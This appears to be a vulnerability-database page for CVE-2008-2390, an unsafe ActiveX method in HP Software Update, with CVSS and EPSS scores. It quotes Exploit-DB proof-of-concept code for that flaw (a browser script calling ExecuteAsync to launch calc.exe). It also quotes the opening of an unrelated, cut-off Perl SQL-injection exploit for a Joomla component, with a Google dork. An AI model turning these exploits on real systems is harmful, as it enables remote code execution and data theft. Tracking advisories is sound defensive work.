CVE-2008-2390
published 2008-05-21CVE-2008-2390: Hpufunction.dll 4.0.0.1 in HP Software Update exposes the unsafe (1) ExecuteAsync and (2) Execute methods, which allows remote attackers to execute arbitrary…
PriorityP343medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
6.86%
93.2th percentile
Hpufunction.dll 4.0.0.1 in HP Software Update exposes the unsafe (1) ExecuteAsync and (2) Execute methods, which allows remote attackers to execute arbitrary code via an absolute pathname in the first argument.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| hp | software_update | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Joomla! Component com_bookflip - 'book_id' SQL Injection
exploitdb·2009-06-29
CVE-2009-2390 Joomla! Component com_bookflip - 'book_id' SQL Injection
Joomla! Component com_bookflip - 'book_id' SQL Injection
---
#!/usr/bin/perl -w
#Joomla com_bookflip(book_id) Sql injection#
########################################
#[~] Author : boom3rang
#[~] Greetz : H!tm@N - KHG - cHs - LiTTLE-HaCkEr - SpywarrioR - cRu3l.b0y - Lanti-Net - urtan
#---------------------------------------
#[!] BookFlip
#[!] Juin 2008
#[!] FCI F-Cimag-In
#[!] Ce composant est distribué gratuitement.
#[!] [email protected]
#[!] www.f-cimag-in.com
#[!] 2.1
#---------------------------------------
#[!] Google_Dork: inurl:"com_bookflip"
########################################
system("color FF0000");
print "\t ###############################################################\n\n";
print "\t # Kosova Hackers Group (KHG-CREW) #\n\n";
print "\t ########################
Exploit-DB
HP Software Update - 'Hpufunction.dll 4.0.0.1' Insecure Method
exploitdb·2008-04-27
CVE-2008-2390 HP Software Update - 'Hpufunction.dll 4.0.0.1' Insecure Method
HP Software Update - 'Hpufunction.dll 4.0.0.1' Insecure Method
---
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
Insecure Methods in HP Update Software.
Remote: Yes
Execute code remotely is possible using methods ExecuteAsync and Execute :-)
If a user visits the malicious page the attacker can execute code.
Coded by callAX
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
Proof of Concept
function Do_it()
{
var Please = "c:\\windows\\system32\\calc.exe"
var Give = "doest_matter"
var Me = "c:\\"
var Freedom = 1;
boom.ExecuteAsync (Please, Give, Me ,Freedom);
}
# milw0rm.com [2008-04-27]
No writeups or analysis indexed.
2008-05-21
Published